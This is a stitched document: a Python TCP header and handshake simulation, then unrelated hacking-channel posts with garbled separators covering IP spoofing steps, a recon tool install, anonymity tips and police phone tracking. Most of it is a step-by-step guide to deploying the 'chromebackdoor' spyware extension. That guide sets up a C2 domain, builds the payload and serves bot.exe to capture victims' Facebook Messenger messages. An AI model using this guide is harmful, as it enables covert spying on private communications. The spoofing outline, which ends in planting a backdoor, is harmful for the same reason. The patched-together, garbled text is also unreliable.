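import struct

SEQ_MOD = 1 << 32                     # 32-bit counter: 0 .. 4,294,967,295
FIN, SYN, ACK = 0x001, 0x002, 0x010   # flag bits in the data-offset/flags word
TCP_HDR = "!HHIIHHHH"                 # src, dst, seq, ack, off/flags, window, csum, urg


def build_tcp_segment(sport, dport, seq, ack, flags, payload=b""):
    """Construct a 20-byte TCP header (no options) plus payload. Constructed sample
    traffic only: the checksum stays 0 because the IP pseudo-header it needs is
    out of scope here."""
    off_flags = (5 << 12) | flags     # data offset = 5 words = 20 bytes
    header = struct.pack(TCP_HDR, sport, dport, seq % SEQ_MOD, ack % SEQ_MOD,
                         off_flags, 65535, 0, 0)
    return header + payload


def parse_tcp_header(segment):
    """Decode the fixed header fields the text describes (ports, seq, ack, flags)
    and split off the payload using the data offset."""
    if len(segment) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack(
        TCP_HDR, segment[:20])
    header_len = (off_flags >> 12) * 4
    if header_len < 20 or header_len > len(segment):
        raise ValueError("bad data offset")
    flags = off_flags & 0x1FF
    return {"src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
            "window": window, "syn": bool(flags & SYN), "fin": bool(flags & FIN),
            "ack_flag": bool(flags & ACK), "payload": segment[header_len:]}


def next_expected_seq(hdr):
    """Sequence number the receiver expects next (what it puts in its ACK field):
    every payload byte is sequenced and SYN and FIN each consume one number.
    The ACK therefore covers all data up through ack - 1, modulo 2**32."""
    return (hdr["seq"] + len(hdr["payload"]) + hdr["syn"] + hdr["fin"]) % SEQ_MOD


def seq_before(a, b):
    """Serial-number comparison on the 32-bit circle: True if a precedes b.
    Plain '<' gives the wrong answer once the counter wraps past 4,294,967,295."""
    return 0 < ((b - a) % SEQ_MOD) < (1 << 31)


def simulate_handshake_and_data(client_isn, server_isn, payload):
    """Walk SYN, SYN/ACK, ACK and one data segment with its acknowledgement,
    returning (label, seq, ack) for each segment as the two sides would emit them."""
    c_port, s_port = 40000, 23            # constructed sample ports
    trace = []
    syn = parse_tcp_header(build_tcp_segment(c_port, s_port, client_isn, 0, SYN))
    trace.append(("client SYN", syn["seq"], None))
    synack = parse_tcp_header(build_tcp_segment(
        s_port, c_port, server_isn, next_expected_seq(syn), SYN | ACK))
    trace.append(("server SYN/ACK", synack["seq"], synack["ack"]))
    ack = parse_tcp_header(build_tcp_segment(
        c_port, s_port, synack["ack"], next_expected_seq(synack), ACK))
    trace.append(("client ACK", ack["seq"], ack["ack"]))
    data = parse_tcp_header(build_tcp_segment(
        c_port, s_port, ack["seq"], ack["ack"], ACK, payload))
    trace.append(("client data", data["seq"], data["ack"]))
    reply = parse_tcp_header(build_tcp_segment(
        s_port, c_port, data["ack"], next_expected_seq(data), ACK))
    trace.append(("server ACK", reply["seq"], reply["ack"]))
    return trace


if __name__ == "__main__":
    # Client ISN placed two below the maximum so the counter wraps mid-exchange.
    for label, seq, ack in simulate_handshake_and_data(0xFFFFFFFE, 1000, b"hello"):
        print(f"{label:15s} seq={seq:>10} ack={ack}")
```

Running the block shows the server's final ACK of 4 after the client's sequence number passes 4,294,967,295, which is why a defender comparing sequence numbers (for example in an IDS reassembler) must use modular comparison.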
๐ฆThe Attack
IP spoofing consists of several steps. First, the target host is chosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.
> Spoofing can be carried out in different ways, as given below:
๐ฆNon-Blind Spoofing :- This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the difficulty of calculating them accurately.
๐ฆBlind Spoofing :- Here the sequence and acknowledgement numbers cannot be observed. To work around this, several packets are sent to the target machine in order to sample its sequence numbers.
๐ฆUsage :
IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against: Denial of Service (DoS) attacks.
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆITWSV - Integrated Tool for Web Security Vulnerability.
ITWSV is an automated penetration testing tool that performs information gathering, auditing and reporting.
Instagram.com/UndercodeTestingCompany
๐ฆINSTALLATION & RUN :
1) git clone https://github.com/penetrate2hack/ITWSV.git
2) cd ITWSV
3) chmod +x start.sh
4) chmod +x update.sh (only if required)
5) ./start.sh
๐ฆFEATURES :
• WHOIS
• DNSWALK
• FIERCE
• DNSRecon
• DNSenum
• NMAP
• DMitry
• theHarvester
• LBD
• SSLScan
• SSLYze
• WhatWeb
• Automater
• Grabber
• Parsero
• Uniscan
• Metagoofil
• A2SV
• WPScan
• Droopescan
• WPSeku
• XssPy
• Spaghetti
• sublist3r
• WAFW00F
• nslookup
• dirsearch
• OWASP Joomscan
• Gobuster
๐ฆTESTED ON :
> PARROT
> DEBIAN
> KALI
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to be completely anonymous online by undercOde:
t.me/UndercOdeTestingOfficial
๐ฆLET'S START :
1) use a fake MAC address for your WLAN card
2) run your Linux or Windows in a VM
3) use the anonsurf tool (VPN + Tor server and much more)
> git clone https://github.com/Und3rf10w/kali-anonsurf
> cd kali-anonsurf
> ./installer.sh
4) use proxies
5) make sure you have the latest updates installed on your system
6) never maximize any browser window
7) never assume you can be anonymous on a phone, rooted or not
! well done
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
------๐๐D๐๐๐ฎ๐D๐-----
๐ฆHACK FACEBOOK MESSENGER USING CHROME BACKDOOR ?
(t.me/UndercodeTestingOfficial)
โ ๏ธFULL GUIDEโ ๏ธ
๐ฆINSTALLATION :
So first we need to git clone the tool.
1) [bash]git clone https://github.com/graniet/chromebackdoor.git[/bash]
2) We can then cd into that directory, and we need to install some dependencies.
3) [bash]apt-get install -y python-pip[/bash]
4) As we are using Ubuntu we need to install python-m2crypto
[bash]apt-get install python-m2crypto[/bash]
5)Now we can install crxmake
[bash]pip install crxmake[/bash]
6) Before we run the program it will require us to enable HTTPS; we can do this using a package available on the Ubuntu LAMP server, letsencrypt
[bash]letsencrypt --apache[/bash]
7) We then need to follow the steps within the setup: first entering a domain name, "c2.iminyour.network", followed by an email address, "dale@demmsec.co.uk". Then we need to accept the terms of service, and we only allow it to be accessed over HTTPS.
8)We can now run chromebackdoor
[bash]python chromebackdoor.py[/bash]
9) This runs the program; however, in order to create the backdoor we need to use an argument, and for this we are going to use the --chrome argument
[bash]python chromebackdoor.py --chrome[/bash]
10) These next steps are kinda confusing, and the English in the program isn't well written, which doesn't help. We need to add where the website will be hosted; in this case we use the full URL "https://c2.iminyour.network/chromebackdoor", then we add what we think is meant to be the relay, so we enter "relais" and confirm the information is correct. We are then presented with a list menu; for this video we use the Facebook Messenger Spy, so we enter "4", and this has now created a zip file. We can now unzip it
[bash]unzip 22029.zip[/bash]
11) From the files that have been extracted, we then need to change the config.php file located in the /web/includes directory using your preferred text editor. We then change the first line of the .php file to:
(Instagram.com/UndercodeTestingCompany)
12) $bdd = new PDO('mysql:host=localhost;dbname=chromebackdoor', 'root', 'toor');
13) If you are using DigitalOcean, the password file is located in
[bash]~/.digitalocean_password[/bash]
14) We can copy this and add it to our config file, so we go back to the file and amend the first line to enter our DigitalOcean password
15) $bdd = new PDO('mysql:host=localhost;dbname=chromebackdoor', 'root', 'newpassword');
16) We then need to install phpMyAdmin and auto-configure Apache 2
[bash]apt-get install phpmyadmin[/bash]
17) We are going to use the copied password from DigitalOcean for phpMyAdmin. Once the configuration has finished we can then access the phpMyAdmin web portal to add chromebackdoor to the database.
18) We need to locate the chromebackdoor.sql file; we can easily find this with MobaXterm's side panel. We then create a new folder on our host machine and copy chromebackdoor.sql into it. We then need to go back to phpMyAdmin and import that file. Once that has been imported and saved we can then go to the web directory, which will take us to the chromebackdoor web portal. We can use the credentials that are in chromebackdoor.sql, which are "root" and "toor"; as you can see there will be nothing in the web portal yet.
19) If we go back to our terminal we need to add the i386 architecture to enable us to use Wine.
[bash]dpkg --add-architecture i386[/bash]
20)Then we need to install wine
[bash] apt-get install wine[/bash]
21) This will throw errors at us; however, we can run this command to fix the issue
[bash]dpkg --configure -a[/bash]
(join t.me/UndercodeTestingOfficial)
22) Now this is done we can use the build argument for chromebackdoor
[bash]python chromebackdoor.py --build[/bash]
23) We are then asked the backdoor type, in this case "--chrome"; we then need to enter the location of the file, "/var/www/html/chromebook/backdoor.crx". This will start the install and will throw loads of errors at us, but it's nothing to worry about. We are then given the option to use a Rubber Ducky payload; for this we choose "n".
24) We can then navigate to our payload, "https://c2.iminyour.network/chromebackdoor/bot.exe"; this will download the file, and if you have anti-virus installed it should alert you, well it did with Avast anyway
25) We can then run the program, which will kill Chrome but will add the extension to Chrome. If we go back to the web portal we will be able to see a bot. This should now, in theory, log any Facebook messages that are sent or received while the payload is running, although this is not the case. We do a bit of troubleshooting and realize that we need to install curl [bash]apt-get install -y php-curl[/bash]
26) We then need to amend the Apache php.ini file located in /etc/php/7.0/apache2/, then search for "curl" by using Ctrl+W within nano and remove the ";" from the line
27) extension=php_curl.dll
After this, restart Apache [bash]service apache2 restart[/bash] and now we can retest by sending another message; we should be able to see messages being saved within the web portal.
๐ฆI said we should, but we don't, so we need to go back to our terminal and copy our .js files to the chromebackdoor directory [bash]cp *.js ../[/bash]
We then finally need to amend the facebookmessage.js file that we have just moved. Locate the line that has "http" in it and change it to "https", and then a few lines down change the line that has "http://localhost:8888..." to our domain, "https://iminyour.network/chromebackdoor/..."
And now!! Finally!! it is working!! We should now be able to see messages being recorded!
ENJOY :)
WRITTEN BY Airlin
-----๐๐D๐๐๐ฎ๐D๐-----
โโโUnder๐ฎ๐d๐-โโ-
๐ฆSTEP BY STEP: HOW POLICE TRACK AND LOCATE A LOST CELL PHONE
(t.me/UndercodeTestingOfficial)
๐ฆStep 1 - A phone can be tracked by its IMEI number as well as by its mobile phone number. If you don't remember the IMEI number of your mobile phone, it can easily be obtained from the telecom operator whose SIM card is being used in that phone. Once you tell your mobile number to your telecom operator, they will tell you the IMEI number of the phone in which that SIM card was being used, because whenever you insert a SIM card in any phone and switch it on, it connects to the network and your telecom operator automatically registers the IMEI number of the device on the network.
Step 2 - If your phone has been stolen, the thief will most likely switch it off, remove and either break or throw away your SIM card and, if he is intelligent enough, format / wipe data / factory-restore the phone so that any tracking software installed on it is removed.
Step 3 - Now he will insert his own or another SIM card in that phone and switch it on. Once it connects to the network of any telecom operator, the IMEI number of your phone will again be registered on the network, now with a different mobile number.
Step 4 - Now the police department makes an enquiry with the telecom regulatory authority of your country about your phone's IMEI number. They will provide the name of the telecom operator along with the mobile number of the SIM card currently being used in your phone.
Step 5 - Now the police department will contact the telecom operator of the mobile number whose SIM card is currently being used in your phone. The telecom operator will provide the details of all the base transceiver stations (BTS, mobile towers) currently providing network to your phone. Every BTS has a different ID to identify its area location.
Step 6 - Whenever your phone is switched on and accessing the network, it is connected at any one time with more than one mobile tower (BTS) located in that area, but communication is made only through the tower nearest to the phone's location.
Step 7 - Now triangulation is applied to find the exact location of your phone. In this method a virtual triangle of signals (radio waves) is formed between the phone and the 3 towers providing network to it, and the angle at which your phone lies is calculated by a mathematical formula. In this way police trace and locate any cell phone's location.
๐ฆFor Android Mobile phone :
Android Device Manager (no GPS required) - This is a phone tracing service launched by Google itself for the protection of Android devices. It works even if the SIM card of your phone is changed. The software is built into every Android phone, but you need to activate it manually: go to Settings > Security > Device administrators > Android Device Manager and enable it. Once activated, you will be able to trace the location of your phone at any time on the internet by logging in to this URL:
https://www.google.com/android/devicemanager . Once you go to this URL, enter your Google Play Store username and password and you will be able to see the current location of your phone. Remember that this way of tracing a phone does not require GPS. You can remotely wipe the data on your phone, lock it and change its password, make it ring loudly, etc., which may help in finding your phone. The only weak point of this application is that if you hard-reset / factory-restore the phone, it will no longer work.
@ mr botnet
-------๐๐D๐๐๐ฎ๐D๐------